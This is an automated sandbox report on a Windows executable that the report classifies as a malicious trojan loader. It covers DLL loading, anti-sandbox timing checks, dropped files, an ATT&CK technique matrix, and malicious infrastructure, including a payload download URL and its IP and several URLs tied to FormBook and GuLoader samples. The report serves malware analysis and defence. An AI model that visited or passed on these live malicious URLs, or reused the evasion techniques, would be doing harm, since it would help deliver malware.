        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
        Source: 5WP9WCM8qV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: 5WP9WCM8qV.exe, 00000002.00000001.1524013890.0000000000649000.00000008.00000001.01000000.00000006.sdmp
        Source: Binary string: mshtml.pdbUGP source: 5WP9WCM8qV.exe, 00000002.00000001.1524013890.0000000000649000.00000008.00000001.01000000.00000006.sdmp

        Data Obfuscation

        barindex
        Source: Yara matchFile source: Process Memory Space: 5WP9WCM8qV.exe PID: 7864, type: MEMORYSTR
        Source: Yara matchFile source: 00000000.00000002.1526284301.0000000006145000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.3280318515.0000000003565000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeFile created: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeAPI/Special instruction interceptor: Address: 6179F5C
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeAPI/Special instruction interceptor: Address: 3599F5C
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeRDTSC instruction interceptor: First address: 61353DB second address: 61353DB instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F7A715C15F7h 0x00000006 inc ebp 0x00000007 test dh, FFFFFFEAh 0x0000000a inc ebx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeRDTSC instruction interceptor: First address: 35553DB second address: 35553DB instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F7A70DFEA47h 0x00000006 inc ebp 0x00000007 test dh, FFFFFFEAh 0x0000000a inc ebx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exe TID: 8028Thread sleep time: -110000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
        Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.0000000005400000.00000004.00000020.00020000.00000000.sdmp, 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeAPI call chain: ExitProcess graph end nodegraph_0-3759
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeAPI call chain: ExitProcess graph end nodegraph_0-3939
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeProcess created: C:\Users\user\Desktop\5WP9WCM8qV.exe "C:\Users\user\Desktop\5WP9WCM8qV.exe"Jump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeCode function: 0_2_00406077 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406077
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        1
        Masquerading
        OS Credential Dumping21
        Security Software Discovery
        Remote Services1
        Archive Collected Data
        1
        Encrypted Channel
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
        Process Injection
        1
        Virtualization/Sandbox Evasion
        LSASS Memory1
        Virtualization/Sandbox Evasion
        Remote Desktop Protocol1
        Clipboard Data
        3
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading
        1
        Access Token Manipulation
        Security Account Manager3
        File and Directory Discovery
        SMB/Windows Admin SharesData from Network Shared Drive3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
        Process Injection
        NTDS23
        System Information Discovery
        Distributed Component Object ModelInput Capture13
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Obfuscated Files or Information
        LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        5WP9WCM8qV.exe21%ReversingLabs
        5WP9WCM8qV.exe100%AviraTR/Injector.dfdyf
        5WP9WCM8qV.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://jm.ybo13.za.com/seb.bin70%Avira URL Cloudsafe
        http://jm.ybo13.za.com/seb.binm40%Avira URL Cloudsafe
        http://jm.ybo13.za.com/seb.bin?0%Avira URL Cloudsafe
        http://jm.ybo13.za.com/seb.binza.com/seb.bin0%Avira URL Cloudsafe
        http://jm.ybo13.za.com/seb.binp40%Avira URL Cloudsafe
        http://jm.ybo13.za.com/seb.bin2476756634-1003q0%Avira URL Cloudsafe
        http://jm.ybo13.za.com/seb.binlI0%Avira URL Cloudsafe
        http://jm.ybo13.za.com/seb.binR40%Avira URL Cloudsafe
        http://jm.ybo13.za.com/seb.bin0%Avira URL Cloudsafe
        http://jm.ybo13.za.com/seb.binZ0%Avira URL Cloudsafe
        http://jm.ybo13.za.com/seb.bing40%Avira URL Cloudsafe
        http://jm.ybo13.za.com/seb.binU4C0%Avira URL Cloudsafe
        http://jm.ybo13.za.com/seb.bin&4r0%Avira URL Cloudsafe
        http://jm.ybo13.za.com/seb.binshqos.dll.mui0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        jm.ybo13.za.com
        45.33.20.235
        truefalse
          high
          NameMaliciousAntivirus DetectionReputation
          http://jm.ybo13.za.com/seb.binfalse
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://jm.ybo13.za.com/seb.binm45WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://jm.ybo13.za.com/seb.binza.com/seb.bin5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd5WP9WCM8qV.exe, 00000002.00000001.1524013890.00000000005F2000.00000008.00000001.01000000.00000006.sdmpfalse
            high
            http://jm.ybo13.za.com/seb.bin75WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://jm.ybo13.za.com/seb.binZ5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://jm.ybo13.za.com/seb.binlI5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053A8000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://jm.ybo13.za.com/seb.binp45WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://jm.ybo13.za.com/seb.bin?5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://jm.ybo13.za.com/seb.binR45WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2145WP9WCM8qV.exe, 00000002.00000001.1524013890.0000000000649000.00000008.00000001.01000000.00000006.sdmpfalse
              high
              http://jm.ybo13.za.com/seb.bin2476756634-1003q5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd5WP9WCM8qV.exe, 00000002.00000001.1524013890.00000000005F2000.00000008.00000001.01000000.00000006.sdmpfalse
                high
                http://www.ftp.ftp://ftp.gopher.5WP9WCM8qV.exe, 00000002.00000001.1524013890.0000000000649000.00000008.00000001.01000000.00000006.sdmpfalse
                  high
                  http://nsis.sf.net/NSIS_ErrorError5WP9WCM8qV.exefalse
                    high
                    http://jm.ybo13.za.com/seb.binshqos.dll.mui5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://jm.ybo13.za.com/seb.bing45WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://jm.ybo13.za.com/seb.bin&4r5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://jm.ybo13.za.com/seb.binU4C5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    45.33.20.235
                    jm.ybo13.za.comUnited States
                    63949LINODE-APLinodeLLCUSfalse
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1549406
                    Start date and time:2024-11-05 16:12:31 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 27s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Run name:Run with higher sleep bypass
                    Number of analysed new started processes analysed:9
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:5WP9WCM8qV.exe
                    renamed because original name is a hash value
                    Original Sample Name:950a25a2f21613cae69f796f6a3eeab57f92b711afb746dfeafefa00d5bfad55.exe
                    Detection:MAL
                    Classification:mal88.troj.evad.winEXE@3/9@1/1
                    EGA Information:
                    • Successful, ratio: 50%
                    HCA Information:
                    • Successful, ratio: 83%
                    • Number of executed functions: 49
                    • Number of non-executed functions: 30
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: 5WP9WCM8qV.exe
                    No simulations
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    45.33.20.235RFQ#_RE-S327_Supply_SA-19.exeGet hashmaliciousFormBookBrowse
                    • www.monoploygo.wiki/nb9a/?hD-8k62X=ByCwUpD9bW9YeruaTjt5XVsiYUEA835dS8hxjYvE8iM9cGFGcS6DBRANF64JDNmh+gWjFxCc+FX/QH31VJrNx7PjyZteJrYo3Q==&H4wHN=1BADxlExn
                    CV.exeGet hashmaliciousFormBookBrowse
                    • www.optime19.com/mg0g/?ADahO=tVY02LJH709h9V&oNHH=JX9bRfLOpqNEOOymRBnYlJpdUNZW4H7R1nhebZtzBw39xumhyI7GOOmZ3KvTtyU7GUZkfEsfAOx+aJi2z4ryOla8ah+kBIEzFA==
                    SHIPPING-DOCUMENTS.exeGet hashmaliciousFormBookBrowse
                    • www.currenttidesdigital.com/o3cp/?Kb6lFr=ajGNsnC4njIFWR6GrwU/KIUPT+4NdTO/Ds6Tr1Elkne+/rIcFjKv3O9TVd3UHeSOvYr/+0me/twPb8QNvIXZz6JEUlGgFmdbwbRYeCFBi4e0&pxa8h=h0ELTHh0
                    17MtYGLcyb.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                    • www.susan-writes.com/kmge/
                    ultimogeniture.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.franchisevideography.com/6vse/?BH=MP4aJTqYC4vQMBtENwlhfMq8DEkCA6FU41CifmM7zlVilMBpP7k0fJAVYKZLDpHGK+bW65bO27W9Q0vaj6/TZG0ALnN1iW9mqQ==&Ku3lb=Dc1klz2LrFZKe
                    SOLICITUD_DE_PRESUPUESTO_RFQ_#180222CO24_y_#160222CO71.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                    • www.totomata.com/u6gs/?TtYxuD=llexJSnf1bqvIVoYINfXRvsI/1nlkp43QmTStd0GVcOzSebbOO9MZhccGRJM6/y6umhHsuORbDq4yFfMn4TD5jJtw2e2ClpEJg==&UJZb9=6xtG
                    prueba_de_pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.plsaoyyhf.buzz/6qe8/?zpw70yIL=ukXk827klQRsiWdsCTzapSwRv6S0Tq2RCfNGTUtN8osxvW3Stx1qonaHetOqbhKCeZoP1W/chE9C1Y2lCuKwY3vn2DNefZiQIg==&qFve=NxiAZrupvj8Izu
                    pedido.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.plsaoyyhf.buzz/6qe8/?UWDf=ukXk827klQRsiWdsCTzapSwRv6S0Tq2RCfNGTUtN8osxvW3Stx1qonaHetOqbhKCeZoP1W/chE9C1Y2lCuKwY3vn2DNefZiQIg==&2a-3kS=OtbxWYkeWKlhu
                    CC_MAIA_T#U00c9CNICApdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.drew.life/f3ne/?Af1=aLdyTF7u4Mn5ivCQ/pmN9IHAmtdhc41T1wfm96PwIns4f2YBQzc780H9m9l5cbzlXgstcL/7rHPnIQQcqLRSI/FTPho9I2pX6A==&MT=0J4HTK8cwbjdI5y-
                    http://api.blusmark.comGet hashmaliciousUnknownBrowse
                    • api.blusmark.com/?gp=1&js=1&uuid=1689002908.0096766536&other_args=eyJ1cmkiOiAiLyIsICJhcmdzIjogIiIsICJyZWZlcmVyIjogImh0dHA6Ly9hcGkuYmx1c21hcmsuY29tLyIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2UvYXZpZixpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC45In0=
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    jm.ybo13.za.comK8ZvbdkrGx.exeGet hashmaliciousGuLoaderBrowse
                    • 45.33.2.79
                    K8ZvbdkrGx.exeGet hashmaliciousGuLoaderBrowse
                    • 45.56.79.23
                    SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exeGet hashmaliciousGuLoaderBrowse
                    • 62.72.43.173
                    SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exeGet hashmaliciousGuLoaderBrowse
                    • 62.72.43.173
                    UMOWA_09.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 62.72.43.173
                    UMOWA_09.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 62.72.43.173
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    LINODE-APLinodeLLCUSK8ZvbdkrGx.exeGet hashmaliciousGuLoaderBrowse
                    • 45.33.2.79
                    K8ZvbdkrGx.exeGet hashmaliciousGuLoaderBrowse
                    • 45.56.79.23
                    https://www.google.lu/url?q=dK5oN8bP2yJ1vL3qF6gT0cR9mW4sH7jD2uY8kX5zM0nW4rT9pB6yG3lF1oJ8qV2kN7dP5uC3xH6tR0jL4wY1vS9mD2bT8nK7yX5rJ3qG0sW6lP9oF2aH1kpQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&esrc=026rlFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bgalapagos%C2%ADhostal%C2%AD%C2%ADtintorera%C2%AD.com%2Fauoth%2Fmeme%2Fnexpoint.com/c2pvaG5zb25AbmV4cG9pbnQuY29tGet hashmaliciousMamba2FABrowse
                    • 66.228.61.234
                    MV Sunshine.exeGet hashmaliciousFormBookBrowse
                    • 45.33.30.197
                    sora.mips.elfGet hashmaliciousMiraiBrowse
                    • 172.104.45.34
                    Payload 94.75 (2).225.exeGet hashmaliciousUnknownBrowse
                    • 139.162.11.98
                    Payload 94.75.225.exeGet hashmaliciousUnknownBrowse
                    • 178.79.154.219
                    hiss.arm7.elfGet hashmaliciousUnknownBrowse
                    • 139.162.173.19
                    hiss.arm.elfGet hashmaliciousUnknownBrowse
                    • 66.228.39.163
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dllK8ZvbdkrGx.exeGet hashmaliciousGuLoaderBrowse
                      K8ZvbdkrGx.exeGet hashmaliciousGuLoaderBrowse
                        JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                              SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exeGet hashmaliciousGuLoaderBrowse
                                SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exeGet hashmaliciousGuLoaderBrowse
                                  UMOWA_09.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    UMOWA_09.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      Process:C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):45
                                      Entropy (8bit):4.7748605961854445
                                      Encrypted:false
                                      SSDEEP:3:FR3tWAAQLQIfLBJXlFGfv:/ktQkIPeH
                                      MD5:8B9FC0443D7E48145E2D4B37AFB2D37B
                                      SHA1:64A5718A478A38AC262D2E46DA81D0E88C122A0F
                                      SHA-256:4F743978EAD44260F895C983689D718E31CA826161C447D205021A9D3E010AFA
                                      SHA-512:5126DA1D29F662465241C8B51B95783DF3F88C8FEB8BB1B65DCF354738C48AAB4BFB6C0035DFE6B40FA03AE5AABA8F72F1C31343AEC7D4EDB9C6EBCC773CC3D3
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:[ReBoot]..Ac=user32::EnumWindows(i r2 ,i 0)..
                                      Process:C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):11776
                                      Entropy (8bit):5.655335921632966
                                      Encrypted:false
                                      SSDEEP:192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
                                      MD5:EE260C45E97B62A5E42F17460D406068
                                      SHA1:DF35F6300A03C4D3D3BD69752574426296B78695
                                      SHA-256:E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
                                      SHA-512:A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Joe Sandbox View:
                                      • Filename: K8ZvbdkrGx.exe, Detection: malicious, Browse
                                      • Filename: K8ZvbdkrGx.exe, Detection: malicious, Browse
                                      • Filename: JOSXXL1.exe, Detection: malicious, Browse
                                      • Filename: Certificado FNMT-RCM.exe, Detection: malicious, Browse
                                      • Filename: Produccion.exe, Detection: malicious, Browse
                                      • Filename: SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exe, Detection: malicious, Browse
                                      • Filename: SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exe, Detection: malicious, Browse
                                      • Filename: UMOWA_09.BAT.exe, Detection: malicious, Browse
                                      • Filename: UMOWA_09.BAT.exe, Detection: malicious, Browse
                                      Reputation:moderate, very likely benign file
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):27
                                      Entropy (8bit):4.134336113194451
                                      Encrypted:false
                                      SSDEEP:3:iGAeSMn:lAeZ
                                      MD5:7AB6006A78C23C5DEC74C202B85A51A4
                                      SHA1:C0FF9305378BE5EC16A18127C171BB9F04D5C640
                                      SHA-256:BDDCBC9F6E35E10FA203E176D28CDB86BA3ADD97F2CFFD2BDA7A335B1037B71D
                                      SHA-512:40464F667E1CDF9D627642BE51B762245FA62097F09D3739BF94728BC9337E8A296CE4AC18380B1AED405ADB72435A2CD915E3BC37F6840F34781028F3D8AED6
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:[Access]..Setting=Enabled..
                                      Process:C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):311990
                                      Entropy (8bit):7.519918348900494
                                      Encrypted:false
                                      SSDEEP:6144:I10DAfUp1X6EIirpvb8OvqC/aStmDUaqHUgJIMz+7ssgZn1yN6ft:ISpdIirpvwOFahDU/IMz+7s/oi
                                      MD5:2207F498823208A0687256F9149A04E3
